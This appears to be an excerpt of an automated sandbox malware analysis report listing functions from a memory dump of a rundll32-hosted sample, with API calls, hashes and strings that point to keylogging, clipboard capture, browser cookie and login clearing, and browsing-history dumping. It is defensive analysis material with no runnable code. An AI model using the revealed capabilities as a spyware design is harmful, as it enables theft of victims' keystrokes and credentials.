                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: bb02fd2fa351b686589276dd70c4298eeda05a6a44988b42713b9728dd3a8d59
                                      • Instruction ID: b31d31466e292983b5a4ad9f747e39ba686815d80074ded990209a7ae0634bab
                                      • Opcode Fuzzy Hash: bb02fd2fa351b686589276dd70c4298eeda05a6a44988b42713b9728dd3a8d59
                                      • Instruction Fuzzy Hash: 83B09B71DC1750D7FB205BF4540F9353F55B714641300485AB587D7110C7B51014CB51
                                      Function 02B4A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                      • Instruction ID: a765b11bb7d2c3417619cd7afb31b5dc1bb17d8aaa4c80c5cd8c5ff612cf6948
                                      • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                      • Instruction Fuzzy Hash: 21A17771A803869FDB21CF58C8E07AEBBE1EF15304F2441EDD9859B281CB399981EB50
                                      Function 02B56C1A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 3222fb71e6cc92309c0d1b904a0a0f9e88b85f7819047024eb0307947f6c1343
                                      • Instruction ID: 5740055c3f9388e20b2e0ebee3ad3da4d6b427b139023320738ef1fbd85a953f
                                      • Opcode Fuzzy Hash: 3222fb71e6cc92309c0d1b904a0a0f9e88b85f7819047024eb0307947f6c1343
                                      • Instruction Fuzzy Hash: 1141F931A005246BDB257BB98CC4B6E3BADDF05770F944AD5FD24DE1D0EF7488405AA1
                                      Function 02B42801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7890a59d5a50c041b21345568fb40e9568104a89163b70efe87e3e55314795d5
                                      • Instruction ID: 0c9b8a39825acaa52a6c758d4605759dc96f2973b9d1e066164762627f69fbab
                                      • Opcode Fuzzy Hash: 7890a59d5a50c041b21345568fb40e9568104a89163b70efe87e3e55314795d5
                                      • Instruction Fuzzy Hash: 12412E71A00314AFD724AF78CC81B5EBBEAEF84710F1045AAF945DB690DB71E541AB90
                                      Function 02B04CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,02B74F50), ref: 02B04DB3
                                      • CreateThread.KERNEL32(00000000,00000000,?,02B74EF8,00000000,00000000), ref: 02B04DC7
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02B04DD2
                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 02B04DDB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3360349984-0
                                      • Opcode ID: dd1b059ef0136b1820c80efc8a510ab82df37d7ba1bb6425fa2eaf8e25833c86
                                      • Instruction ID: 354483f4f56e7943b44fe3d808200221a8a80a15d3762c07666a367d97cac670
                                      • Opcode Fuzzy Hash: dd1b059ef0136b1820c80efc8a510ab82df37d7ba1bb6425fa2eaf8e25833c86
                                      • Instruction Fuzzy Hash: 2841A271548341AFC716EB65CD94EBFBFEEAF84350F44099DF996831D0DB209908CA62
                                      Function 02B0C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • Cleared browsers logins and cookies., xrefs: 02B0C0F5
                                      • [Cleared browsers logins and cookies.], xrefs: 02B0C0E4
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 071bbf5002226da2ca61d463133e794f192f5c867e1c30f014d82c67b3cc44d2
                                      • Instruction ID: 604e50590f384f4a99b03e754f1a4250052e9a00c6042b8a0a327d6fd43d5aed
                                      • Opcode Fuzzy Hash: 071bbf5002226da2ca61d463133e794f192f5c867e1c30f014d82c67b3cc44d2
                                      • Instruction Fuzzy Hash: A331B5057483C06EEA136BB454D6BAA7F838F93648F4846DEACD50B3D2EB56440CD7A3
                                      Function 02B0A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B1C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1C561
                                        • Part of subcall function 02B1C551: GetWindowTextLengthW.USER32(00000000), ref: 02B1C56A
                                        • Part of subcall function 02B1C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 02B1C594
                                      • Sleep.KERNEL32(000001F4), ref: 02B0A573
                                      • Sleep.KERNEL32(00000064), ref: 02B0A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: 1cc0ab310d278b997b63c958291dc8d27a003e33ed68dbbb23897a8f99fb4cb4
                                      • Instruction ID: c619cf8544f1d8e7f0ded8bf7d924acd18b55ad9c6659611fcf48c2b0ec2a45f
                                      • Opcode Fuzzy Hash: 1cc0ab310d278b997b63c958291dc8d27a003e33ed68dbbb23897a8f99fb4cb4
                                      • Instruction Fuzzy Hash: CF11A1315143005BC61AB778CC929AF7FBAAF51300F80099DE697564E2FF65EE08CAD2
                                      Function 02B43A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2354b39ba0f1631b092c0bb78c0bc05187a30f1878d04f2734f6ceadc9cf6f4d
                                      • Instruction ID: 2c9b030398360243a420eb0646c1ca3f373f75bf895046b4e625157ddee8e580
                                      • Opcode Fuzzy Hash: 2354b39ba0f1631b092c0bb78c0bc05187a30f1878d04f2734f6ceadc9cf6f4d
                                      • Instruction Fuzzy Hash: 8C01A2B3A497167EFA2129786CC0F6B279DDF417B8B3807E7B531621D0DF608C5069A0
                                      Function 02B43AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d50d413c9a5fe71375f5cd57b5cd137e2fdb7a75efcceb397d61dec09e0cd0a9
                                      • Instruction ID: 2f089eecb870167616fcc339a855c234450d7b0c120126774e124afb139eb47e
                                      • Opcode Fuzzy Hash: d50d413c9a5fe71375f5cd57b5cd137e2fdb7a75efcceb397d61dec09e0cd0a9
                                      • Instruction Fuzzy Hash: 2E01D6B26096117EEA2129786CC4F37638DDF413F933C47E6F531521E4DF608D01A5A0
                                      Function 02B0A675 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02B0A74D), ref: 02B0A6AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02B0A74D), ref: 02B0A6BA
                                      • Sleep.KERNEL32(00002710,?,?,?,02B0A74D), ref: 02B0A6E7
                                      • CloseHandle.KERNEL32(00000000,?,?,?,02B0A74D), ref: 02B0A6EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID:
                                      • API String ID: 1958988193-0
                                      • Opcode ID: 2d8f116859623f415204e8322b2e9e4f52f13beb12aae28ea0181f4f536757c7
                                      • Instruction ID: fccce74b547790c59eab25c94dd39f5376a3b835de3901fb3c035fd50216dd8a
                                      • Opcode Fuzzy Hash: 2d8f116859623f415204e8322b2e9e4f52f13beb12aae28ea0181f4f536757c7
                                      • Instruction Fuzzy Hash: 4E110A30A84750EEE633A76494E8A6E3F7AFB41395F440C88E38247AC1C75168E4C755
                                      Function 02B48566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,02B4850D,00000000,00000000,00000000,00000000,?,02B48839,00000006,FlsSetValue), ref: 02B48598
                                      • GetLastError.KERNEL32(?,02B4850D,00000000,00000000,00000000,00000000,?,02B48839,00000006,FlsSetValue,02B5F160,02B5F168,00000000,00000364,?,02B482E7), ref: 02B485A4
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02B4850D,00000000,00000000,00000000,00000000,?,02B48839,00000006,FlsSetValue,02B5F160,02B5F168,00000000), ref: 02B485B2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: dcc00aa3d640a48a8a994a8262b1dd5b3c39f8fbeb809bbb0a9fc09754b561fd
                                      • Instruction ID: 0284096b243dbe8eb5f40569870fd2580c69ac79ffabf132e8f6a48ad4750aa6
                                      • Opcode Fuzzy Hash: dcc00aa3d640a48a8a994a8262b1dd5b3c39f8fbeb809bbb0a9fc09754b561fd
                                      • Instruction Fuzzy Hash: 5101F732A46732DBCB214A789C84B577B9AEF05BE1B150A64FD06DB241DF20D910CBE0
                                      Function 02B1C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 02B1C4B2
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B1C4D7
                                      • CloseHandle.KERNEL32(00000000), ref: 02B1C4E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 672713a667fa6dfa37a0f21ec36080d367f469190c930c69e33c40c9575eabe9
                                      • Instruction ID: 721c9a7526d333cd0f7359d38892afcc271fc96a74c77484f87d03ab258a4e81
                                      • Opcode Fuzzy Hash: 672713a667fa6dfa37a0f21ec36080d367f469190c930c69e33c40c9575eabe9
                                      • Instruction Fuzzy Hash: B9F0F6B1286318BFF7111B25ACC5FBF3B5CEB866A4F00056AF942E71C0CB254D058572
                                      Function 02B1C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02B1C1F5
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02B1C208
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02B1C233
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02B1C23B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 39102293-0
                                      • Opcode ID: 0937d70ce51a0265eb02a370ee238ead61a1fbf111abe1a7c8644fb7b43e5400
                                      • Instruction ID: 2eb156b3af787db6caaee37b1aa08a9af83458122ebc2534a6079ea0fb7cce60
                                      • Opcode Fuzzy Hash: 0937d70ce51a0265eb02a370ee238ead61a1fbf111abe1a7c8644fb7b43e5400
                                      • Instruction Fuzzy Hash: 480126B16C0725EBE61552949C89F77BB7CDB44AD1F4000E2FA84D3190EF608D4186F2
                                      Function 02B39863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 02B3987A
                                        • Part of subcall function 02B39EB2: ___AdjustPointer.LIBCMT ref: 02B39EFC
                                      • _UnwindNestedFrames.LIBCMT ref: 02B39891
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 02B398A3
                                      • CallCatchBlock.LIBVCRUNTIME ref: 02B398C7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction ID: 3875fcfb0b56de8febc95caa4a4c05bffd521bcfcc6921f9012dd3a08e52a50c
                                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                      • Instruction Fuzzy Hash: 2B01D332000509FBCF12AF55CD00EEA3BBAEF99754F1581A4F95866120C7B6E8A1DFA1
                                      Function 02B193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 02B193F0
                                      • GetSystemMetrics.USER32(0000004D), ref: 02B193F6
                                      • GetSystemMetrics.USER32(0000004E), ref: 02B193FC
                                      • GetSystemMetrics.USER32(0000004F), ref: 02B19402
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID:
                                      • API String ID: 4116985748-0
                                      • Opcode ID: 2d38664bc8556f7550a9d985a918eb3ace67ef39453976cd273c04bf52d0f604
                                      • Instruction ID: 77a2159bca825388a7f03cd63357399c533dea63e72826f8750b893483d6bfec
                                      • Opcode Fuzzy Hash: 2d38664bc8556f7550a9d985a918eb3ace67ef39453976cd273c04bf52d0f604
                                      • Instruction Fuzzy Hash: 68F0C2B1F003554BD750EA759CA1B2F6BD6EBC4260F1408BEE2088B281EEB4DC058BC1
                                      Function 02B38F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02B38F31
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02B38F36
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02B38F3B
                                        • Part of subcall function 02B3A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02B3A44B
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02B38F50
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0
                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction ID: 8bda8faf6d720e4ae7890d28e00bfd3ff8fe80c45ec7ac4d1c6a14140510a8dd
                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                      • Instruction Fuzzy Hash: 90C04C05040681551D5376B021443AD33475F623947E498D5ECE4970028B06001A5D37
                                      Function 02B42C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 02B42CED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525
                                      • Opcode ID: 2302c5609f2f42c30a7edd261cf613bc4ec1abe068b3f65e7bf1a532cbdd803e
                                      • Instruction ID: c1bd9447eb3af5ab5670dd6ce79118ae8f013003e07bb3453e4e309ffb0606bf
                                      • Opcode Fuzzy Hash: 2302c5609f2f42c30a7edd261cf613bc4ec1abe068b3f65e7bf1a532cbdd803e
                                      • Instruction Fuzzy Hash: 9A515861E0420397CB167B14C9C037A6BA4EB40B90F248DEDF896872A9EF358594FA46
                                      Function 02B0404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02B04066
                                        • Part of subcall function 02B1B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,02B66468,02B0D20D,.vbs,?,?,?,?,?,02B752F0), ref: 02B1B99F
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B040F5,?,?,02B040F5,02B65E74), ref: 02B1857E
                                        • Part of subcall function 02B18568: CloseHandle.KERNEL32(02B65E74,?,?,02B040F5,02B65E74), ref: 02B18587
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      • Sleep.KERNEL32(000000FA,02B65E74), ref: 02B04138
                                      Strings
                                      • /sort "Visit Time" /stext ", xrefs: 02B040B2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "
                                      • API String ID: 368326130-1573945896
                                      • Opcode ID: c9f6f52be8e38b545e21ed84e1a4b4951061bb05c994a32e564b7afc9617e8c0
                                      • Instruction ID: 0fd0471888c211dacb71d33c6695e2d10144ffae294154c65fb09d229306b98e
                                      • Opcode Fuzzy Hash: c9f6f52be8e38b545e21ed84e1a4b4951061bb05c994a32e564b7afc9617e8c0
                                      • Instruction Fuzzy Hash: 85314171A102185BDB1AF7B4D8D59EEBB7BAF91300F4000E9E50AA71D4EF605D49CF91
                                      Function 02B0B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B34770: __onexit.LIBCMT ref: 02B34776
                                      • __Init_thread_footer.LIBCMT ref: 02B0B797
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968
                                      • Opcode ID: e7fb8275b99b4f833e7935bc024e452447549ca1a2bd949a1a8a0b644106765a
                                      • Instruction ID: d9d8aba434c1dca21e7eb70f83f446bde8d7d71a925950d3f4201558ea8c11ce
                                      • Opcode Fuzzy Hash: e7fb8275b99b4f833e7935bc024e452447549ca1a2bd949a1a8a0b644106765a
                                      • Instruction Fuzzy Hash: FB219132A102088ACB1AFB64D8D1DEDBB7AAF54314F5005E9D50A571D1EF34AD4ACE90
                                      Function 02B51B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 02B51C12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036
                                      • Opcode ID: fdfa6dfeb5286579e3059ec766527ae5f664744bf971ec9908469da99f857866
                                      • Instruction ID: ef66e15a198da8bf5cfd0951f22e58989538a6395f6f086a1c7d5f3d7739f521
                                      • Opcode Fuzzy Hash: fdfa6dfeb5286579e3059ec766527ae5f664744bf971ec9908469da99f857866
                                      • Instruction Fuzzy Hash: C821D662A64520A7DB24DF6CC940BAB736AEB48B65F4685E4ED0EDF100F732D940C390
                                      Function 02B04FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,02B75598,?,00000000,?,?,?,?,?,?,02B15CC9,?,00000001,0000004C,00000000), ref: 02B05030
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • GetLocalTime.KERNEL32(?,02B75598,?,00000000,?,?,?,?,?,?,02B15CC9,?,00000001,0000004C,00000000), ref: 02B05087
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02B0501F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-1507639952
                                      • Opcode ID: f127b2bd2432dc64aa170835f952f37bbd7b446255bda62ff3d957f9ded4b656
                                      • Instruction ID: ca242795e3d15dc61c45d71a857d44310b8a67a72f8f3cd16970885d140a22c0
                                      • Opcode Fuzzy Hash: f127b2bd2432dc64aa170835f952f37bbd7b446255bda62ff3d957f9ded4b656
                                      • Instruction Fuzzy Hash: FD2123A1D002805BD722B734D889B3FBF99EB55388FC408ADDC8507185EA29961CCFE3
                                      Function 02B1B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i
                                      • API String ID: 481472006-2430845779
                                      • Opcode ID: f5b6ae1a0bdeb87c500a18fae6907d3c1fdd1d0efd0d79f63e910959523664e8
                                      • Instruction ID: d62765d2ceb5363fae162963c1d7d9f827fbb370dac38b4e6040ee0272c8ba8b
                                      • Opcode Fuzzy Hash: f5b6ae1a0bdeb87c500a18fae6907d3c1fdd1d0efd0d79f63e910959523664e8
                                      • Instruction Fuzzy Hash: 5F11B9714182445AC309FB65D8949FFBBEAAF48340F40099EF8D5830D0EF38DA49CB55
                                      Function 02B0B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B0B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02B0B172
                                        • Part of subcall function 02B0B164: wsprintfW.USER32 ref: 02B0B1F3
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • CloseHandle.KERNEL32(?), ref: 02B0B0B4
                                      • UnhookWindowsHookEx.USER32 ref: 02B0B0C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
                                      • API String ID: 1623830855-1496645233
                                      • Opcode ID: 0b229c212c3bee96c52558c9ece92d50b9c2673c9e99a8b5fe993b4efc24b922
                                      • Instruction ID: 682d303563b2d9b6d9eff77cf2a0535d56b9346999417ee27606758959f4d35f
                                      • Opcode Fuzzy Hash: 0b229c212c3bee96c52558c9ece92d50b9c2673c9e99a8b5fe993b4efc24b922
                                      • Instruction Fuzzy Hash: CC01D431A042049BDB227B38C84AB7E7FB6AB42304F8004DDD946075D5FF661459DFD2
                                      Function 02B0C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 02B0C4F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                      • API String ID: 1174141254-4188645398
